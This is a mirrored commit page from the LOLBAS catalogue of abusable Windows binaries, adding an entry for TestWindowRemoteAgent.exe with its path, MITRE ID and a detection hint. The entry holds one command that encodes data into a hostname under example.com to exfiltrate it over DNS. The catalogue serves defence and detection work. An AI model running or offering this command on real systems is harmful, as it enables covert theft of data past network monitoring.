mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 07:18:05 +01:00
Create testwindowremoteagent.yaml
Data Exfiltration with TestWindowRemoteAgent.exe is added
This commit is contained in:
parent
a6bf398fa8
commit
25b6c36073
19
yml/OSBinaries/testwindowremoteagent.yaml
Normal file
19
yml/OSBinaries/testwindowremoteagent.yaml
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
Name: TestWindowRemoteAgent.exe
|
||||
Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
|
||||
Author: Onat Uzunyayla
|
||||
Created: 2023-21-08
|
||||
Commands:
|
||||
- Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
|
||||
Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
|
||||
Usecase: Attackers may utilize this to exfiltrate data over DNS
|
||||
Category: Data Exfiltration
|
||||
Privileges: User
|
||||
MitreID: T1048
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
|
||||
Detection:
|
||||
- IOC: TestWindowRemoteAgent.exe spawning unexpectedly
|
||||
Acknowledgement:
|
||||
- Person: Onat Uzunyayla
|
Loading…
Reference in New Issue
Block a user